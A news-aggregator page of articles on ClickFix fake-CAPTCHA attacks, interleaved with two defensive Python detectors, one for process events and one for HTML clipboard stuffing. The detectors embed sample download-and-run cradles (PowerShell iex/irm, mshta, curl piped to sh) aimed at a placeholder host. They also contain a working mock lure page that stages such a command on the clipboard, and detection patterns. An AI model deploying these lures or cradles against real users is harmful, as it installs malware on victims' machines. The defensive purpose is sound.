Latest news with #ClickFix


Techday NZ
3 days ago
- Techday NZ
ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.

ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."

Lateral movement and initial access trends
Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."

Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.

MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.

Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also recorded increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."

Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware group's Cleo campaign.

Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.

Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."

Recommendations and defensive measures
ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.
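The chain the report describes leaves a distinctive endpoint signature: the Run dialog is hosted by explorer.exe, so a ClickFix victim produces explorer.exe spawning powershell.exe or mshta.exe with a pasted download cradle on the command line, which is exactly the "advanced monitoring" the recommendations call for. The following is an added example, not ReliaQuest's code or anything from the report: a small Python scorer over constructed process-creation events in a simplified Sysmon Event ID 1 / Security 4688 shape, combining the interactive-parent check with command-line markers so that a user typing "cmd" into Run does not fire on its own. It also generalises to the macOS "curl | sh" variant covered further down this page. The field names, thresholds, pattern list and sample events are all assumptions for the demo.

```python
"""Score process-creation events for ClickFix-style launches.

Added example (not ReliaQuest's code). Assumes events have already been
parsed into the simplified Sysmon Event ID 1 / Security 4688-like shape
below; the sample events at the bottom are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str    # path of the newly created process
    parent: str   # path of the parent process
    cmdline: str  # full command line of the new process
    user: str


# Binaries that pasted ClickFix one-liners typically drive.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "curl", "sh", "bash", "zsh"}  # last four: macOS/Linux variant

# Parents that mean a human typed or pasted the command. On Windows the
# Run dialog (Win+R) is hosted by explorer.exe, so explorer.exe -> powershell.exe
# is the classic ClickFix parent/child pair.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal"}

# Markers common to pasted download cradles: hidden window, no profile,
# Invoke-Expression over a web fetch, a remote HTA, or curl piped to a shell.
CRADLE_PATTERNS = [
    re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    re.compile(r"-nop(rofile)?\b", re.I),
    re.compile(r"\b(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"\bmshta(\.exe)?\s+\S*(https?:|\\\\)", re.I),
    re.compile(r"\bcurl\b.*\|\s*(sh|bash|zsh)\b", re.I),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Score 0 means the image is not a LOLBIN."""
    reasons: list[str] = []
    image = _basename(ev.image)
    if image not in LOLBINS:
        return 0, reasons
    parent = _basename(ev.parent)
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"{image} spawned by interactive parent {parent}")
    for pat in CRADLE_PATTERNS:
        if pat.search(ev.cmdline):
            reasons.append(f"command line matches /{pat.pattern}/")
    return len(reasons), reasons


def detect(events, threshold: int = 2):
    """Return (event, score, reasons) for events scoring at least `threshold`:
    an interactive parent plus one cradle marker, or two cradle markers."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample events (assumed shape, not real telemetry).
SAMPLE_EVENTS = [
    # 1. Classic ClickFix: Run dialog -> PowerShell download cradle.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -w hidden -nop -c "iex (irm http://example.invalid/c)"',
              "CORP\\alice"),
    # 2. ClickFix via MSHTA fetching a remote HTA.
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta http://example.invalid/v.hta", "CORP\\alice"),
    # 3. Benign: scheduled PowerShell script started by the service host.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\services.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
              "NT AUTHORITY\\SYSTEM"),
    # 4. Benign: user ran a command from the Run dialog, no cradle markers.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
              "cmd /c ipconfig /all", "CORP\\bob"),
    # 5. macOS variant: Terminal -> curl piped into sh.
    ProcEvent("/usr/bin/curl",
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
              "curl -fsSL http://example.invalid/s.sh | sh", "carol"),
]


if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(f"[{score}] {ev.user}: {ev.cmdline}")
        for r in reasons:
            print("    -", r)
```

On the sample set only events 1, 2 and 5 are returned; event 4 scores 1 (interactive parent, nothing else) and stays below the threshold. A hit with an explorer.exe parent is worth confirming on the host against HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which keeps the Run dialog's command history. Note that the policy the report recommends (disabling Run for non-admin users) removes only that parent path; a lure can equally tell the user to open a terminal and paste there, which is why the command-line markers carry weight of their own.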


Forbes
5 days ago
- Forbes
Your Passwords Are At Risk — New Windows XFiles Attack Confirmed
Windows passwords come under attack from the XFiles threat. Two things that are guaranteed to strike fear into the hearts of anyone concerned about cybersecurity attacks are Windows and passwords. Combine the two, and you have the basis of what can be something of a security nightmare. With Microsoft account password spraying attacks and warnings over opening specific Outlook files in the news as Windows email, passwords and 2FA codes come under attack, this is kind of understandable. Now, with confirmation of a password-stealing threat called XFiles, is there even more cause for concern? The truth, as they say, is out there. A group of self-proclaimed elite threat hunters and cyber analysts has issued a warning that attackers deploying a malware payload called XFiles, also known as DeerStealer, are targeting Windows users in order to compromise passwords that can then be sold on dark web criminal marketplaces. A June 12 report published by the eSentire Threat Response Unit has revealed how, throughout May, threat actors have been using the XFiles payload to steal Windows passwords that are then sold by a dark web user known only as LuciferXfiles. The methods employed are sadly all too familiar, involving ClickFix attacks during the initial access stage. These tech support scams combine seemingly genuine offers of help with supposed security issues around account activity with fake CAPTCHA verification prompts that have the victim execute malicious commands from the Windows Run prompt. Should the victim get to this stage, they then download something called HijackLoader, often obfuscated inside an encrypted PNG image, which in turn downloads the real payload, the XFiles infostealer, to compromise passwords, browser 2FA session cookies, instant messages and more. Read the full report for a detailed technical analysis of the entire attack chain.
When it comes to mitigation, however, the eSentire TRU advice is clear: I would have to add to this that opening the Windows Run prompt and pasting the clipboard's content, which is how ClickFix attacks work, is hardly conducive to good security practice or, frankly, common sense. I mean, how many Captcha or I Am Not A Robot tests have ever asked you to do that? The answer is zero. Protect your passwords by not being tricked into doing something that is so obviously out of the ordinary.


Techday NZ
09-06-2025
- Business
- Techday NZ
ClickFix phishing surge spoofs Booking.com to target hotels
Research from Cofense Intelligence has identified a series of phishing campaigns targeting hotel chains in the accommodation and food services sector. These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, which alone accounted for 47% of the total campaign volume.

The phishing emails impersonate Booking.com and direct recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts that install remote access trojans (RATs) or information-stealing malware.

ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as Booking.com and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, that inadvertently run a malicious script. The script is placed on the user's clipboard by the fraudulent site, typically when the user clicks a specific button, and the user is then told to paste it into the Windows Run prompt. Sometimes these scripts are obfuscated to look like verification codes, increasing the likelihood that the user will not recognise them as harmful. In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.

Cofense's analysis of the active threat reports (ATRs) in this campaign shows that 75% of ATRs with fake CAPTCHAs used Booking.com-spoofing ClickFix templates, while the rarer variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. 64% of campaign ATRs delivered RATs, 47% delivered information stealers, and 11% delivered both. XWorm RAT is the most commonly observed malware, present in 53% of campaign ATRs; Pure Logs Stealer (19%) and DanaBot (14%) are the most popular information stealers.

The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages used generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and reference specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links. Some emails state that the link will only work on Windows, and recipients who open the site on other operating systems receive a message to that effect. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications (HTA) which, once executed, install RATs or steal data from the victim's device.


Forbes
04-06-2025
- Business
- Forbes
This Dangerous Email Tricks You Into Hacking Your Own PC
Image: Do not be tricked into hacking your own PC (Getty)
Take a walk through any major tourist city in the world, and eventually you will see them. On a bridge or promenade or in a park. Someone sitting with three plastic cups and a bunch of onlookers, watching as someone is scammed. Everyone knows it's a scam. It doesn't matter that you've watched as the marble is placed under a cup, keeping an eagle eye on it as the three cups are swapped around. The marble has moved and you cannot win. You know you should know better. So it is with the so-called ClickFix lures currently hacking PCs around the world. The leading example of the new wave of 'scam yourself' attacks, you know you should know better. But the cleverness of the hook, the trickery of the scammer still works.

As McAfee explains, ClickFix attacks 'begin with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.' In reality, this 'sophisticated form of social engineering, leveraging the appearance of authenticity' just 'manipulates users into executing malicious scripts.'

Image: The email lure (Cofense)
A new warning from Cofense has just outed one of the most devious lures I've seen recently. It's a nasty attack that plays on the human emotions and fears of the victim being scammed, so much so that they don't see the attack coming. But they should. The dangerous email lure is sent to businesses in the travel industry, purporting to be from market giant Booking.com, warning that a customer has made a serious complaint and giving the recipient a time-boxed opportunity to respond using the link provided.

Image: This click launches ClickFix (Cofense)
'While the exact email structure varies from sample to sample,' Cofense says, 'these campaigns generally provide emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers.' The campaign 'preys on the recipient's fear of leaving a guest dissatisfied' and might 'claim that a guest was trying to contact the hotel but was unable to get a response.' Cofense provides one such example, which is 'particularly notable for mentioning potential reputational damage and giving a strict 24-hour deadline for compliance.'

Image: ClickFix attack (Cofense)
Not all these attacks are negative; some suggest requests or questions from future (imaginary) guests, while also providing a link for the hotel operator to respond. 'The emails used in these campaigns will sometimes state that the embedded link only works on Windows computers,' simply because this malware only infects Windows PCs. But despite the lure, the attack is the same as all the others. In this case it's a CAPTCHA 'Robot or Human?' challenge, which instructs the user to open a Windows prompt and paste in the text on the PC's clipboard, and then press Enter. Absent a few wording changes, there is no variation in this part of the attack. It's the most blatant tell. Cofense says some of the latest attacks used Cloudflare CAPTCHAs while others used Booking.com branding instead. The instructions, though, are all the same. Once you know about ClickFix, in theory at least you can't be fooled. But the cybercriminals will try nonetheless, and the attacks are flying, so it's working. Don't be fooled. Never paste in copied text and hit Enter in this way. Whether it's a CAPTCHA, a secure website or document restriction, or a technical fault, it's always an attack. And the hacker is always you.
Yahoo
03-06-2025
- General
- Yahoo
Devious new ClickFix malware variant targets macOS, Android, and iOS using browser-based redirections
- Security researchers found ClickFix attacks evolving to target other operating systems
- On Android and iOS, the attack is particularly worrisome, as it turns into a drive-by attack
- The malware is already being flagged by antivirus programs

ClickFix, an infamous hacking technique that tricks people into running malware in the belief that they are fixing a problem on their computer, has evolved, experts have warned. New research from c/side has revealed that what used to be a Windows-only attack method is now capable of targeting macOS, iOS and Android devices as well.

In a blog post analysing the evolution, the researchers said the new attack starts with a compromised website. The threat actors inject JavaScript code that redirects users to a new browser tab when they click certain elements on the page. The new tab displays a page that looks like a legitimate URL shortener, with a message to copy and paste a link into the browser, and doing so triggers yet another redirect, this time to a download page. Here is where the technique diverges, depending on the operating system of the victim. On macOS, the attack leads to a terminal command that fetches and executes a malicious shell script, already flagged by multiple antivirus programs. On Android and iOS, things are even worse, since the attack no longer requires any user interaction. 'When we tested this on Android and iOS, we expected a ClickFix variant. But instead, we encountered a drive-by attack,' the researchers explained. 'A drive-by attack is a type of cyberattack where malicious code is executed or downloaded onto a device simply by visiting a compromised or malicious webpage. No clicks, installs, or interaction required.' In this case, the site downloads a .TAR archive file holding malware. This one, too, was flagged by at least five antivirus programs already.
'This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach,' c/side explained. 'What started as a Windows-specific ClickFix campaign is now targeting macOS, Android, and iOS, significantly expanding the scale of the operation.'
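The Cofense pieces above describe the page side of ClickFix (a button that loads the command onto the clipboard, a Windows-only gate, a command padded to look like a verification code), and c/side's research starts from JavaScript injected into a compromised site. Those traits are visible in the page source before any user is fooled, which is what a web-script monitor or a URL sandbox can key on. The following is an added example, not Cofense's or c/side's tooling: a Python scanner over already-fetched HTML that scores inline scripts and handler attributes for clipboard-write APIs, command-like string literals (including ones hidden behind atob), and user-agent gating. The three pages it runs on are constructed for the demo; the regexes, weights and the "likely" threshold are assumptions, not a published signature.

```python
"""Static scan of a page's inline JavaScript for ClickFix clipboard stuffing.

Added example, not Cofense's or c/side's tooling. Assumes the HTML has
already been fetched (nothing here touches the network); the three sample
pages at the bottom are constructed for the demo.
"""
import base64
import binascii
import re

SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
HANDLER_ATTR = re.compile(r'\son\w+\s*=\s*"([^"]*)"', re.I)
# Clipboard write APIs the lure uses to stage the command for Win+R / Ctrl+V.
CLIPBOARD_APIS = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|document\.execCommand\s*\(\s*['\"]copy['\"]", re.I)
# OS gating: the lure only "works" on Windows, or switches payload by platform.
OS_GATE = re.compile(
    r"navigator\.(userAgent|platform)\b[^;]{0,80}(Windows|Mac|Android|iPhone)", re.I)
STRING_LITERAL = re.compile(r"""(["'`])((?:\\.|(?!\1).)*)\1""", re.S)
ATOB_LITERAL = re.compile(r"""atob\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
# What a staged command looks like, including the "I am not a robot" tail that
# pads the Run dialog so only benign-looking text is visible to the victim.
COMMAND_MARKERS = [
    re.compile(r"\b(powershell|pwsh|mshta|rundll32|certutil)\b|\bcmd(\.exe)?\s+/c\b", re.I),
    re.compile(r"\b(iex|irm|iwr|invoke-expression|invoke-webrequest)\b", re.I),
    re.compile(r"\bcurl\b.*\|\s*(sh|bash|zsh)\b", re.I),
    re.compile(r"[✅✔☑].{0,40}(robot|human|verif)", re.I),
]


def _candidate_strings(js: str):
    """Yield string literals plus the decoded form of any atob('...') argument."""
    for _quote, literal in STRING_LITERAL.findall(js):
        yield literal
    for b64 in ATOB_LITERAL.findall(js):
        try:
            yield base64.b64decode(b64, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue


def scan_html(html: str) -> dict:
    """Score inline scripts and on*= handlers; weights are assumptions."""
    result = {"clipboard_write": False, "os_gate": False,
              "command_strings": [], "score": 0, "clickfix_likely": False}
    chunks = SCRIPT_TAG.findall(html) + HANDLER_ATTR.findall(html)
    for js in chunks:
        if CLIPBOARD_APIS.search(js):
            result["clipboard_write"] = True
        if OS_GATE.search(js):
            result["os_gate"] = True
        for s in _candidate_strings(js):
            if any(p.search(s) for p in COMMAND_MARKERS):
                result["command_strings"].append(s[:80])
    score = ((2 if result["clipboard_write"] else 0)
             + (2 if result["command_strings"] else 0)
             + (1 if result["os_gate"] else 0))
    result["score"] = score
    # A clipboard write on its own is normal web behaviour ("copy link");
    # it becomes suspicious only together with a command-shaped string.
    result["clickfix_likely"] = score >= 4
    return result


# Constructed lure page: fake CAPTCHA whose button stages a command on the clipboard.
LURE_PAGE = """
<div id="captcha"><p>Verify you are human</p><button id="verify">I'm not a robot</button>
<ol id="steps" style="display:none"><li>Press Win+R</li><li>Press Ctrl+V</li><li>Press Enter</li></ol></div>
<script>
  var cmd = 'powershell -w hidden -c "iex (irm http://example.invalid/v)" # ✅ I am not a robot - Verification ID: 7391';
  document.getElementById('verify').addEventListener('click', function () {
    if (navigator.userAgent.indexOf('Windows') === -1) {
      document.getElementById('steps').textContent = 'Open this page on a Windows computer.';
      return;
    }
    navigator.clipboard.writeText(cmd);
    document.getElementById('steps').style.display = 'block';
  });
</script>
"""

# Constructed benign page: a "copy link" button also writes to the clipboard.
BENIGN_PAGE = """
<input id="share" value="https://example.invalid/article/42" readonly>
<button id="copy">Copy link</button>
<script>
  document.getElementById('copy').onclick = function () {
    navigator.clipboard.writeText(document.getElementById('share').value);
  };
</script>
"""

# Constructed variant that hides the command in base64 and decodes it client-side.
_B64 = base64.b64encode(b"mshta http://example.invalid/v.hta").decode()
OBFUSCATED_PAGE = ('<button onclick="stage()">Verify</button>'
                   '<script>function stage(){navigator.clipboard.writeText(atob("'
                   + _B64 + '"));}</script>')


if __name__ == "__main__":
    for name, page in [("lure", LURE_PAGE), ("benign", BENIGN_PAGE), ("obfuscated", OBFUSCATED_PAGE)]:
        r = scan_html(page)
        print(f"{name:10s} score={r['score']} likely={r['clickfix_likely']} cmds={r['command_strings']}")
```

The benign "copy link" page scores 2 and is not flagged, while both the plain and the base64-wrapped lures cross the threshold. Two limits matter in practice: external `<script src>` files and string-splitting or character-code obfuscation are invisible to a regex pass, so a production check should also fetch referenced scripts or hook `navigator.clipboard.writeText` in a headless browser and inspect what is actually written; and the mobile branch c/side describes (a .TAR download with no interaction) never touches the clipboard, so it needs a separate check on automatic downloads and redirects.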